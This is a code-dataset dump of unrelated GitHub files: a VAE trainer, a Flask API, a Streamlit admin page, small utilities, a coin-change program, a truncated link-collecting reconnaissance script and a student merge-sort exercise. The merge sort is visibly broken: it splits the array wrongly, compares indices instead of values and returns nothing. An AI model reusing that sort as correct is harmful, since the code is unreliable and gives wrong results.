* 20 + \" Shuffling And Creating Final DataSet \" + \"#\" * 20)\n\n df_finalist = pd.DataFrame(finale, columns=[\"payload\", \"category\"])\n df_finalist[\"payload\"] = df_finalist[\"payload\"].apply(MergeList)\n\n # if df_finalist.isnull().sum() > 1:\n # print(\"[!] There are null in datas\")\n df_shuffled = df_finalist.sample(frac=1, random_state=555).reset_index(drop=True)\n # df_shuffled= df_shuffled.dropna(how=\"any\")\n print(df_shuffled.isnull().sum())\n df_shuffled.to_csv(\"data/final/final.csv\", \",\", index=False)\n\n df_finalist[\"payload\"] = df_finalist['payload'].str.encode('utf-8')\n df_finalist[\"payload\"] = df_finalist[\"payload\"].apply(ToHex)\n\n # # utf-8 hex encoded version\n # print(bytearray.fromhex(df_finalist['payload'][44]))\n\n df_shuffled = df_finalist.sample(frac=1, random_state=555).reset_index(drop=True)\n # df_shuffled = df_shuffled.dropna(axis=1)\n df_shuffled.to_csv(\"data/final/final_hex.csv\", \",\", index=False)\n\n print(\"All done check out data/final folder\")\n\n\n#\n#\ndef ToHex(s):\n return s.hex()\n\n\ndef KeyExist(key, p_dict):\n if key in p_dict.keys():\n return True\n else:\n return False\n\n\ndef CountKeys(key, p_dict):\n count = 0\n for k in p_dict[\"category\"]:\n if k == key:\n count += 1\n return count\n\n\ndef MergeList(s):\n if isinstance(s, list):\n return str(s[0])\n elif isinstance(s, bytes):\n return str(s.decode())\n elif isinstance(s, str):\n return s\n else:\n return s\n","repo_name":"0xsha/PayloadDetector","sub_path":"helpers/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":15703,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"39303104311","text":"import os\nimport time\nfrom ast import literal_eval\nfrom datetime import datetime\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.datasets as Datasets\nimport torchvision.models as models\nimport torchvision.transforms as T\nimport torchvision.utils as vutils\nfrom torch.utils.data import Dataset, DataLoader\nfrom tqdm.notebook import trange, tqdm\n\nfrom RES_VAE0 import VAE\nfrom vgg19 import VGG19\n\n# ---------------------------------------------------------------\ndate_time_obj = datetime.now()\ntimestamp_str = date_time_obj.strftime(\"%Y-%m-%d_%H.%M.%S\")\nprint('Current Timestamp : ', timestamp_str)\nstart_time_total = time.perf_counter()\n# ---------------------------------------------------------------\n# Parameter you can change\n\nbatch_size = 128\nnum_epoch = 1\n# Available datasets: celeba_small, celeba\ndataset = \"celeba_small\" # < --------------change this!\nprint(\"dataset = \", dataset)\nlatent_dim = 128 # < --------------change this!\n\n# Checkpoint os pretrained models\n# \"CNN_VAE_celeba_small_2022-08-04_21.40.10\" (small, for testing)\n# \"CNN_VAE_celeba_2022-08-04_18.05.43\" (large model trained for 20 epochs)\n# \"celebA_64_8_epoch_latent_dim_128\"\n# \"CNN_VAE_celeba_2022-08-04_23.22.32\" (add condition to layer 4, trained for 10 epochs, good result, latent = 128) RES_VAE2, run2\n# CNN_VAE_celeba_2022-08-05_01.49.10 #(VAE3) (add condition to layer 5)\n# CNN_VAE_celeba_2022-08-05_03.20.52 #python run2.py (add condition to layer 4) VAE2 , latent dim = 128\n# CNN_VAE_celeba_2022-08-05_11.31.54 # run2.py (add condition to layer 4) VAE2, latent dim = 512 (quality not good, 10 epoch)\n\n#continue training \"CNN_VAE_celeba_2022-08-04_23.22.32\" for 10 epochs, ...\n\n# !! no \"pt\"\n# set to None if you do not want to load a checkpoint\n#\nload_checkpoint = None\nrun_train = True\n\n# logging\nif run_train and load_checkpoint:\n print(\"Train with pretrained model...\")\nelif run_train and load_checkpoint is None:\n print(\"Train from scratch...\")\nelif load_checkpoint is not None and not run_train:\n print(\"Only load pretrained model, do not train...\")\nelif load_checkpoint is None and not run_train:\n #print(\"Set run_train to True or give a checkpoint\")\n raise SystemExit(\"!Set run_train to True or give a checkpoint...\")\n\n\n# ---------------------------------------------------------------\n# Parameters you may NOT want to change\ncondition_dim = 512\nimage_size = 64\nlr = 1e-4\nstart_epoch = 0\ndataset_root = \"./input/\"\nsave_dir = os.getcwd()\nbeta = 0.1\n\n# ---------------------------------------------------------------\nuse_cuda = torch.cuda.is_available()\nGPU_indx = 0\ndevice = torch.device(GPU_indx if use_cuda else \"cpu\")\n\n# ---------------------------------------------------------------\nif load_checkpoint:\n model_name = load_checkpoint\nelse:\n model_name = f\"CNN_VAE_{dataset}_{timestamp_str}\" # \"STL10_8\" #\"STL10_8\" #STL10_8_64.pt\n\n\n# ---------------------------------------------------------------\nclass CelebA_CLIP(Datasets.ImageFolder):\n def __init__(\n self,\n root,\n transform,\n image_folder,\n clip_embeddings_csv\n ):\n super(CelebA_CLIP, self).__init__(\n root=root,\n transform=transform\n )\n\n self.clip_embeddings = clip_embeddings_csv\n self.samples = self.make_dataset_(root, None, None, None)\n self.root = os.path.join(root, image_folder)\n\n def __len__(self) -> int:\n return len(self.samples)\n\n def make_dataset_(self, root, class_to_idx, extensions, is_valid_file):\n df = pd.read_csv(self.clip_embeddings, index_col=0,\n converters={'embeddings': literal_eval})\n im_names = df['image_id'].values\n # img_embed = zip(df['image_id'].values, df[\"embeddings\"].values)\n # img_embed = tuple(zip(range(len(im_names)), im_names, df[\"embeddings\"].values))\n targets = df[\"embeddings\"].values # #(batch,)\n img_embed = tuple(zip(im_names, targets))\n\n return list(img_embed)\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n # print(len(self.samples))\n # print(\"index,\", index)\n path, target = self.samples[index]\n # print(\"path\", path)\n path = os.path.join(self.root, path)\n # print(\"path\", path)\n\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n\n target = torch.tensor(target)\n\n return sample, target\n\n\n# ---------------------------------------------------------------\ndef get_data_STL10(transform, batch_size, download=True, root=\"./input\"):\n print(\"Loading trainset...\")\n trainset = Datasets.STL10(root=root, split='unlabeled', transform=transform, download=download)\n\n trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)\n\n print(\"Loading testset...\")\n testset = Datasets.STL10(root=root, split='test', download=download, transform=transform)\n\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)\n print(\"Done!\")\n\n return trainloader, testloader\n\n\ndef get_data_celebA(transform, batch_size, download=False, root=\"/data\"):\n # data_root = \"../../datasets/celeba_small/celeba/\"\n data_root = \"../../datasets/resized_celebA2/\"\n training_data = CelebA_CLIP(root=data_root,\n transform=transform,\n image_folder=\"celebA\",\n clip_embeddings_csv=\"./embeddings.csv\")\n print(\"dataset size\", len(training_data)) # 202599\n test_size = 16\n train_size = len(training_data) - test_size\n trainset, testset = torch.utils.data.random_split(training_data, [train_size, test_size])\n\n trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=8)\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=8)\n print(\"Done load dataset\")\n return trainloader, testloader, train_size\n\n\ndef get_data_celebA_small(transform, batch_size, download=False, root=\"/data\"):\n data_root = \"./datasets/celeba_small/celeba/\"\n training_data = CelebA_CLIP(root=data_root,\n transform=transform,\n image_folder=\"img_align_celeba\",\n clip_embeddings_csv=\"./embeddings_128.csv\")\n\n print(\"dataset size\", len(training_data)) # 128\n test_size = 16\n train_size = len(training_data) - test_size\n trainset, testset = torch.utils.data.random_split(training_data, [train_size, test_size])\n\n trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=8)\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=8)\n print(\"Done load dataset\")\n return trainloader, testloader, train_size\n\n\n# ---------------------------------------------------------------\nif dataset == \"celeba\":\n # transform = T.Compose([T.CenterCrop(178),T.Resize((image_size,image_size)), T.ToTensor()])\n # transform = T.Compose([T.Resize((image_size,image_size)), T.ToTensor()])\n transform = T.Compose([T.Resize(image_size), T.ToTensor()])\n trainloader, testloader, train_size = get_data_celebA(transform, batch_size, download=True, root=dataset_root)\nelif dataset == \"celeba_small\":\n transform = T.Compose([T.CenterCrop(178), T.Resize((image_size, image_size)), T.ToTensor()])\n trainloader, testloader, train_size = get_data_celebA_small(transform, batch_size, download=True, root=dataset_root)\nelse:\n transform = T.Compose([T.Resize(image_size), T.ToTensor()])\n trainloader, testloader = get_data_STL10(transform, batch_size, download=True, root=dataset_root)\n\n# ---------------------------------------------------------------\n# get a test image batch from the testloader to visualise the reconstruction quality\ndataiter = iter(testloader)\ntest_images, test_labels = dataiter.next()\nprint(\"load test batch\")\nprint(\"image input shape\", test_images.shape)\nprint(\"condition shape\", test_labels.shape) # torch.Size([16, 1, 512])\n\n\n# ---------------------------------------------------------------\n# OLD way of getting features and calculating loss - Not used\n\n# create an empty layer that will simply record the feature map passed to it.\nclass GetFeatures(nn.Module):\n def __init__(self):\n super(GetFeatures, self).__init__()\n self.features = None\n\n def forward(self, x):\n self.features = x\n return x\n\n\n# download the pre-trained weights of the VGG-19 and append them to an array of layers .\n# we insert a GetFeatures layer after a relu layer.\n# layers_deep controls how deep we go into the network\ndef get_feature_extractor(layers_deep=7):\n C_net = models.vgg19(pretrained=True).to(device)\n C_net = C_net.eval()\n\n layers = []\n for i in range(layers_deep):\n layers.append(C_net.features[i])\n if isinstance(C_net.features[i], nn.ReLU):\n layers.append(GetFeatures())\n return nn.Sequential(*layers)\n\n\n# this function calculates the L2 loss (MSE) on the feature maps copied by the layers_deep\n# between the reconstructed image and the origional\ndef feature_loss(img, recon_data, feature_extractor):\n img_cat = torch.cat((img, torch.sigmoid(recon_data)), 0)\n out = feature_extractor(img_cat)\n loss = 0\n for i in range(len(feature_extractor)):\n if isinstance(feature_extractor[i], GetFeatures):\n loss += (feature_extractor[i].features[:(img.shape[0])] - feature_extractor[i].features[\n (img.shape[0]):]).pow(2).mean()\n return loss / (i + 1)\n\n\n# Linear scaling the learning rate down\ndef lr_Linear(epoch_max, epoch, lr):\n lr_adj = ((epoch_max - epoch) / epoch_max) * lr\n set_lr(lr=lr_adj)\n\n\ndef set_lr(lr):\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\ndef vae_loss(recon, x, mu, logvar):\n recon_loss = F.binary_cross_entropy_with_logits(recon, x)\n KL_loss = -0.5 * (1 + logvar - mu.pow(2) - logvar.exp()).mean()\n loss = recon_loss + 0.01 * KL_loss\n return loss\n\n\n# ---------------------------------------------------------------\n\n# Create the feature loss module\n\n# load the state dict for vgg19\nstate_dict = torch.hub.load_state_dict_from_url('https://download.pytorch.org/models/vgg19-dcbb9e9d.pth')\n# manually create the feature extractor from vgg19\nfeature_extractor = VGG19(channel_in=3)\n\n# loop through the loaded state dict and our vgg19 features net,\n# loop will stop when net.parameters() runs out - so we never get to the \"classifier\" part of vgg\nfor ((name, source_param), target_param) in zip(state_dict.items(), feature_extractor.parameters()):\n target_param.data = source_param.data\n target_param.requires_grad = False\n\nfeature_extractor = feature_extractor.to(device)\n\n# ---------------------------------------------------------------\n\n# Create the save directory if it does note exist\nif not os.path.isdir(save_dir + \"/Models\"):\n os.makedirs(save_dir + \"/Models\")\nif not os.path.isdir(save_dir + \"/Results\"):\n os.makedirs(save_dir + \"/Results\")\n\nresult_folder = os.path.join(save_dir, \"Results\", f\"result_{model_name}\")\nif not os.path.exists(result_folder):\n os.mkdir(result_folder)\n\n# ---------------------------------------------------------------\n# Load / Initialize the model\nmodel_save_path = os.path.join(save_dir, \"Models\", model_name + \".pt\")\n\n\n\nif load_checkpoint:\n\n if model_name == \"CNN_VAE_celeba_2022-08-04_18.05.43\":\n batch_size = 128\n condition_dim = 512\n latent_dim = 512\n checkpoint = torch.load(save_dir + \"/Models/\" + model_name + \".pt\", map_location=\"cpu\")\n print(\"Checkpoint loaded\")\n vae_net = VAE(channel_in=3 + condition_dim, ch=64, z=latent_dim, condition_dim=condition_dim).to(device)\n optimizer = optim.Adam(vae_net.parameters(), lr=lr, betas=(0.5, 0.999))\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n vae_net.load_state_dict(checkpoint['model_state_dict'])\n start_epoch = checkpoint[\"epoch\"]\n loss_log = checkpoint[\"loss_log\"]\n\n else:\n vae_net = torch.load(model_save_path)\n\nelif run_train:\n # If checkpoint does exist raise an error to prevent accidental overwriting\n if os.path.isfile(model_save_path):\n # raise ValueError(\"Warning Checkpoint exists\")\n print(\"Warning Checkpoint exists\")\n\n # Create VAE network\n # z = latent dim, ch = out channel\n print(\"Initialize VAE net ...\")\n vae_net = VAE(channel_in=3, ch=64, z=latent_dim).to(device)\n\n# setup optimizer\noptimizer = optim.Adam(vae_net.parameters(), lr=lr, betas=(0.5, 0.999))\n# Loss function\nBCE_Loss = nn.BCEWithLogitsLoss()\n\n# ---------------------------------------------------------------\ndef convert_batch_to_image_grid(image_batch, dim=64):\n print(\"image_batch\", image_batch.shape)\n # torch.Size([16, 3, 64, 64])\n reshaped = (image_batch.reshape(4, 8, dim, dim, 3)\n .transpose(0, 2, 1, 3, 4)\n .reshape(4 * dim, 8 * dim, 3))\n return reshaped\n\n\nimport torchvision\n\n\ndef show_image_grid(img_tensor, save_path):\n grid_img = torchvision.utils.make_grid(img_tensor.cpu())\n plt.figure(figsize=(20, 20))\n plt.imshow(grid_img.permute(1, 2, 0))\n plt.axis('off')\n plt.show()\n plt.savefig(os.path.join(save_path), dpi=200, bbox_inches='tight')\n\n\ndef save_each_image(img_tensor):\n img_tensor = img_tensor.detach()\n for i in range(img_tensor.shape[0]):\n img = img_tensor[i].permute(1, 2, 0)\n plt.imshow(img.numpy())\n im_name = 'img_{}.png'.format(i)\n plt.savefig(os.path.join(save_dir, \"Results\", im_name), dpi=200, bbox_inches='tight')\n\n\n\ndef image_generation():\n batch = 16\n latent_dim = vae_net.latent_dim\n # sample both initial input and condition\n mu = torch.zeros(batch, latent_dim , 1, 1) + 1.0\n log_var = torch.zeros(batch, latent_dim, 1, 1) + 0.3\n # # print(mu.shape)\n # zero_tensor = torch.zeros(batch, condition_dim, 1, 1).to(device)\n\n\n z = vae_net.encoder.sample(mu.to(device), log_var.to(device))\n #z_cond = torch.cat((z, zero_tensor), dim=1)\n # print(\"zcond\",z_cond.shape) #zcond torch.Size([128, 512, 1, 1])\n logits = vae_net.decoder(z)\n generated = torch.sigmoid(logits)\n save_path = os.path.join(result_folder, \"generation_zero.png\")\n vutils.save_image(generated, save_path)\n print(\"save image at\", save_path)\n save_path2 = os.path.join(result_folder, \"generation_zero2.png\")\n show_image_grid(generated, save_path2)\n\n\n# ----------------------------------------------------------\ndef train():\n\n loss_log = []\n\n # save log\n with open(os.path.join(result_folder, \"params.txt\"), \"w\") as f:\n f.write(f\"epoch = {num_epoch}\\n\")\n f.write(f\"learning_rate = {lr}\\n\")\n f.write(f\"train_size = {train_size}\\n\")\n f.write(f\"batch_size = {batch_size} \\n\")\n f.write(f\"label_dim = {condition_dim}\\n\")\n f.write(f\"image_size = {image_size}\\n\")\n f.write(f\"latent_dim = {latent_dim}\\n\")\n f.write(f\"beta = {beta}\\n\")\n f.write(f\"model checkpoint = {model_save_path}\\n\\n\")\n\n for epoch in trange(start_epoch, num_epoch, leave=False):\n start_time_epoch = time.perf_counter()\n lr_Linear(num_epoch, epoch, lr)\n vae_net.train()\n for i, (images, _) in enumerate(tqdm(trainloader, leave=False)):\n images = images.to(device)\n #condition = condition.to(device) # [batch, 512]\n # recon_data = [batch, 3 + 512, 64, 64]\n recon_data, mu, logvar = vae_net(images)\n\n # VAE loss\n loss = vae_loss(recon_data, images, mu, logvar)\n\n # Perception loss\n loss += feature_extractor(torch.cat((torch.sigmoid(recon_data), images), 0))\n\n loss_log.append(loss.item())\n vae_net.zero_grad()\n loss.backward()\n optimizer.step()\n\n # In eval mode the model will use mu as the encoding instead of sampling from the distribution\n print(\"epoch\", epoch)\n exec_time_epoch = time.perf_counter() - start_time_epoch\n\n print(f\"time epoch = {exec_time_epoch} sec ({exec_time_epoch / 60.0} min )\\n\")\n with open(os.path.join(result_folder, \"params.txt\"), \"a\") as f:\n f.write(f\"\\nepoch {epoch}, time epoch = {exec_time_epoch} sec ({exec_time_epoch / 60.0} min )\\n\")\n\n vae_net.eval()\n with torch.no_grad():\n recon_data, _, _ = vae_net(test_images.to(device))\n images = torch.cat((torch.sigmoid(recon_data.cpu()), test_images), 2)\n save_path = os.path.join(result_folder, \"recon\" + \"_\" + str(epoch) + \".png\")\n # save_path = \"%s/%s/%s_%d_%d.png\" % (save_dir, \"Results\", model_name, image_size, epoch)\n # print(images.shape) # [128, 3, 128, 64]\n print(\"save image at\", save_path)\n vutils.save_image(images, save_path)\n\n # Save a checkpoint\n torch.save(vae_net, model_save_path)\n # torch.save({\n # 'epoch': epoch,\n # 'loss_log': loss_log,\n # 'model_state_dict': vae_net.state_dict(),\n # 'optimizer_state_dict': optimizer.state_dict()\n #\n # }, model_save_path)\n # torch.save(vae_net, model_save_path)\n print(\"Save checkpoint at\", model_save_path)\n\n exec_time_total = time.perf_counter() - start_time_total\n print(f\"time total = {exec_time_total} sec ({exec_time_total / 60.0} min )\\n\")\n with open(os.path.join(result_folder, \"params.txt\"), \"a\") as f:\n f.write(f\"\\ntime total = {exec_time_total} sec ({exec_time_total / 60.0} min )\\n\")\n\n\n# ---------------------------------------------------------------\nif __name__ == \"__main__\":\n if run_train:\n train()\n image_generation()\n\n","repo_name":"meanna/CVAE_VGG19","sub_path":"train_no_condition.py","file_name":"train_no_condition.py","file_ext":"py","file_size_in_byte":18197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38867846345","text":"from PIL import Image\n\n\ndef count_pixels(file_path, color: tuple):\n \"\"\"Принимает путь к файлу и искомый цвет в виде (R, G, B),\n преобразует файл в RGB, собирает словарь цветов вида {цвет: количество пикселей} с помощью PIL.getcolors.\n Возвращает количество пикселей соответствующего цвета.\n \"\"\"\n img = Image.open(file_path)\n img.convert('RGB')\n color_dict = {color: count for count, color in img.getcolors(img.size[0]*img.size[1])} # img.size[0]*img.size[1] -\n try: # - макс количество цветов\n pixel_count = color_dict[color] # на изображении\n return pixel_count\n except KeyError:\n pixel_count = -1\n return pixel_count\n","repo_name":"rand0mizator/TestTaskSimple","sub_path":"main/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41196148862","text":"import streamlit as st\n\n# set back homepage state\nst.session_state.click = False\n\n# default admin session sate as false\n# st.session_state.admin = False\n# set admin sesstion state\nif 'admin' not in st.session_state:\n st.session_state.admin = False\n\n\nif not st.session_state.admin:\n st.warning(\"You must log-in to see the content of this page!\")\n st.stop()\nelse:\n # only show it when logged in with Admin crendentials\n st.title(\"Welcome, Admin\")\n # sidebar for admin page\n\n menu = [\"Create Profile\",\"View Profile\", \"Edit Profile\", \"Delete Profile\",\"Access Azure\"]\n choice = st.sidebar.radio(\"Select operation\",menu)\n if choice == \"Create Profile\":\n st.subheader(\"Create Profile\")\n\n elif choice == \"View Profile\":\n st.subheader(\"View Profile\")\n\n elif choice == \"Edit Profile\":\n st.subheader(\"Edit Profile\")\n\n elif choice == \"Delete Profile\":\n st.subheader(\"Delete Profile\")\n\n elif choice == \"Access Azure\":\n st.subheader(\"Access Azure\")\n","repo_name":"KarenJin-NZ/CS301-AttendanceSystem","sub_path":"app/pages/Admin.py","file_name":"Admin.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31208324030","text":"import matplotlib.pyplot as plt\nimport random\nimport time\n\n###########################################\n\ndef TableauAuHasard(n):\n TabHasard=[random.randint(1,10001) for i in range(n)]\n return TabHasard\n\ndef TriFusion(n,T):\n if n>1:\n n1=n//2\n n2 = n - n1\n T1=T[0:n1]\n T2=T[n2:]\n gauche = TriFusion(n1,T1)\n droite = TriFusion(n2,T2)\n fusionne = Fusion(n1,n2,gauche,droite,T)\n return fusionne\n\n \n\ndef Fusion(n1, n2, T1, T2, T):\n i1 = 0\n i2 = 0\n i = 0\n while(i1 < n1 and i2 < n2):\n if i1 <= i2:\n T[i] = T1[i1]\n i += 1\n i1 += 1\n else :\n T[i] = T1[i2]\n i += 1\n i2 += 1\n if i1 == n1:\n while i2 < n2:\n T[i] = T[i2]\n i += 1\n i2 += 1\n else :\n while i1 < n1:\n T[i] = T[i1]\n i += 1\n i1 += 1\n\n\ndef TriBulles(n,T):\n pass\n #\n # A COMPLETER (et enlever pass)\n #\n\n#######Programme Principal########\n\nchoix=int(input(\"Taper 1 pour un test sur le TriFusion, 2 pour un comparatif TriFusion/TriBulles: \"))\nif choix==1:\n Tab=[0]\n n=int(input(\"Entrez la taille du tableau à trier: \"))\n Tab=TableauAuHasard(n)\n print(\"Tableau à trier: \",Tab)\n TabFusion=list(Tab)\n TriFusion(n, TabFusion)\n print(\"Après TriFusion: \",TabFusion)\n TriBulles(n, Tab)\n print(\"Après TriBulles: \",Tab)\nelse: \n #Valeurs de n choisies \n abscisses = [n for n in range(1,1000,10)]\n #Temps de calcul\n tps1 = []\n tps2 = []\n for n in range(1,1000,10):\n T=TableauAuHasard(n)\n T2=list(T)\n t=time.time()\n TriBulles(n, T)\n tps1.append(time.time()-t)\n t=time.time()\n TriFusion(n, T2)\n tps2.append(time.time()-t)\n #Tracé\n plt.plot(abscisses, tps1)\n plt.plot(abscisses, tps2)\n plt.show()","repo_name":"Manguil/fds","sub_path":"L2/S4/Algoritmique/TP2/TP2Exo1TriFusion.py","file_name":"TP2Exo1TriFusion.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"fr","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"14104623456","text":"import os\nimport json\nfrom flask import Flask\nfrom flask_restful import abort, Api, Resource\nfrom functools import wraps\n\n\napp = Flask(__name__)\napi = Api(app)\ndatasetpart = {}\ndatasetparthourly = {}\n\n\ndef cors(func, allow_origin=None, allow_headers=None, max_age=None):\n if not allow_origin:\n allow_origin = \"*\"\n if not allow_headers:\n allow_headers = \"content-type, accept\"\n if not max_age:\n max_age = 60\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n response = func(*args, **kwargs)\n cors_headers = {\n \"Access-Control-Allow-Origin\": allow_origin,\n \"Access-Control-Allow-Methods\": func.__name__.upper(),\n \"Access-Control-Allow-Headers\": allow_headers,\n \"Access-Control-Max-Age\": max_age,\n }\n if isinstance(response, tuple):\n if len(response) == 3:\n headers = response[-1]\n else:\n headers = {}\n headers.update(cors_headers)\n return (response[0], response[1], headers)\n else:\n return response, 200, cors_headers\n return wrapper\n\n\ndef abortIfNotExist(fileName):\n filepath = '../data/json/' + fileName\n if not os.path.exists(filepath):\n abort(404, message=\"{} doesn't exist\".format(fileName))\n\n\nclass Resource(Resource):\n method_decorators = [cors]\n\n\nclass DataResource(Resource):\n\n def get(self, parameters):\n print('request in')\n try: # params: city&factor1&factor2\n params = parameters.split('&')\n params = [p.split('=')[1] for p in params]\n print(params)\n with open('../data/json/' + params[1] + '.json', 'r') as f:\n city = params[0]\n data = json.load(f)\n data1 = []\n for d in data:\n data1.append({'value': d[city], 'date': d['date']})\n with open('../data/json/' + params[2] + '.json', 'r') as f:\n data2 = json.load(f)\n with open('../data/ccm/ccm.json', 'r') as f:\n # {Tokyo: {rainfall: {temperature: [kyoto: 1, nagoya: 1]} }}\n data = json.load(f)\n # data3 = data[params[0]][params[1]][params[2]]\n tmp_dict = data[params[0]]\n k0 = params[0]\n # {'cloud':{'rainfall':{'Kyoto':0.1}'}}\n data3 = []\n for k1, v1 in tmp_dict.items(): # k1=cloud\n for k2, v2 in v1.items(): # k2=rainfall\n for k3, v3 in v2.items(): # k3=kyoto\n data3.append([k0 + '-' + k1 + '-' + k2 + '-' + k3,\n str(v3[int(params[3]) - 1])])\n return [data1, data2, data3]\n except:\n abort(404, message=\"data doesn't exist\")\n\n\napi.add_resource(DataResource, '/data/')\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(debug=True, host='0.0.0.0', port=port)\n","repo_name":"g-yuqing/WeatherCausalityVis","sub_path":"py/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21914072929","text":"import opinion as op\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\nY0 = np.array([0.0,4.0,5.0,6.0,10.0,11.0,12.0])\nP0 = np.array([0.01,0.01])\nX0 = np.concatenate((Y0,P0))\n\nt = np.linspace(0.0,30.0,100)\n\nX = odeint(op.dynX, X0, t)\n\nx0 = X[:,0].reshape(-1,1)\nxi = X[:,1:-2]+x0\n\nplt.plot(t,x0,'r')\nplt.plot(t,xi,'b')\nplt.show()","repo_name":"florian-die/opinion-optimal-python","sub_path":"test_ode.py","file_name":"test_ode.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13936848157","text":"# Script uses selenium to automatcally launch a browser and go to python.org and then uses python.org search functionality to search for \"pycon\"\n\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\ndriver=webdriver.Firefox()\ndriver.get('http://www.python.org')\nassert \"Python\" in driver.title\n\nelem=driver.find_element_by_name(\"q\")\nelem.send_keys(\"pycon\")\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in driver.page_source\ndriver.close()\n","repo_name":"MayankPratap/i_love_python","sub_path":"python_org_search.py","file_name":"python_org_search.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"20207477745","text":"def count():\n\tDollars = (10000,5000,2000,1000,500,200,100,25,10,5,1)\n\tEuros = (50000,20000,10000,5000,2000,1000,500,200,100,50,20,10,5,2,1)\n\tYen = (100000,50000,20000,10000,5000,1000,500,100,50,10)\n\tPounds = (5000,2000,1000,500,200,100,50,20,10,5,1)\n\n\tquestion = input(\"Select your currency (type '?' for options), or type 'custom' to add one: \")\n\tif (question == \"?\"):\n\t\tcurrencies = (\"-dollars\", \"-euros\", \"-yen\", \"-pounds\", \"-custom\", \"*all lowercase\")\n\n\t\tfor words in currencies:\n\n\t\t print(words)\n\t\tcount()\n\telif (question == \"dollars\"):\n\t\tcurrency = Dollars\n\telif (question == \"euros\"):\n\t\tcurrency = Euros\n\telif (question == \"yen\"):\n\t\tcurrency = Yen\n\telif (question == \"pounds\"):\n\t\tcurrency = Pounds\n\telif (question == \"custom\"):\n\t\tnum = input(\"Okay. Now, please provide coins/bills values separated by commas. e.g. 100,20,0.25: \")\n\t\tC_list = list(map(float,num.split(',')))\n\t\tCustomCurrency = tuple(sorted([i * 100 for i in C_list], reverse = True))\n\t\tcurrency = CustomCurrency\n\telse:\n\t\tprint(\"Currency not recognized, try again.\")\n\t\tcount()\n\n\n\ttotal = 100*eval(input(\"What is the total ammount of money (in your currency)? \"))\n\tcoinsE = 0\n\tfor i in currency:\n\t\tcoins, remain = divmod(total,i)\n\t\ttotal = round(remain)\n\t\tcoinsE += coins\n\tif (remain == 0):\n\t\tprint(\"You need at least \", coinsE, \" coins/bills to match that ammount.\")\n\telse:\n\t\tprint(\"Your currency or total is defective, you can't match that ammount.\")\n\treturnC = input(\"Do you want to evaluate a different change? (yes/no) \")\n\tif (returnC == \"yes\"):\n\t\tcount()\n\telse: \n\t\tinput(\"Press ENTER to return to the main screen\")\n\t\treturn\n\n","repo_name":"jppriet0/CAAP-CS","sub_path":"hw1/coins.py","file_name":"coins.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31098553381","text":"#!/usr/bin/env python3\r\n\r\nimport argparse\r\nimport sys\r\nfrom banner.Banner import banner\r\nimport useragent\r\n\r\n#Cores\r\nR = '\\033[31m' # Vermelho\r\nG = '\\033[32m' # Verde\r\nEND = '\\033[0m'\r\n\r\ndef error(msg):\r\n print(f'{R}[-] ERRO: {msg}{END}')\r\n sys.exit(1)\r\n\r\ntry:\r\n import requests\r\nexcept:\r\n print(\"É preciso instalar a biblioteca requests\")\r\n print()\r\n print(\"pip3 install requests\")\r\n sys.exit()\r\n\r\ntry:\r\n from bs4 import BeautifulSoup\r\nexcept:\r\n print(\"É preciso instalar a biblioteca beautifulsoup\")\r\n print()\r\n print(\"pip install beautifulsoup4\")\r\n sys.exit()\r\n\r\nfora = set()\r\nnoescopo = set()\r\nverifica = set()\r\n\r\n# Função que verifica arquivos no site\r\n# Usado para verificar o robots.txt\r\ndef verifica_arquivo(url,file,silent=0):\r\n r = requests.get(f'{url}/{file}', headers=headers)\r\n if r.status_code == 200:\r\n if silent == 0:\r\n print(f'{G}[+] {file} existe{END}')\r\n print(f'[*] Conteúdo de {file}:')\r\n print()\r\n print(r.text)\r\n else:\r\n print(f'[*] Conteúdo de {file}:')\r\n print(r.text)\r\n\r\n else:\r\n print(f'{R}[-] {file} não existe{END}')\r\n\r\n# Função que busca links presentes na página\r\ndef pega_links(url):\r\n r = requests.get(url, headers=headers)\r\n content = r.text\r\n \r\n soup = BeautifulSoup(content, 'html.parser')\r\n all_links = soup.find_all('a')\r\n\r\n links = set()\r\n for link in all_links:\r\n if \"http\" in link.get(\"href\"):\r\n links.add(link.get(\"href\"))\r\n else:\r\n 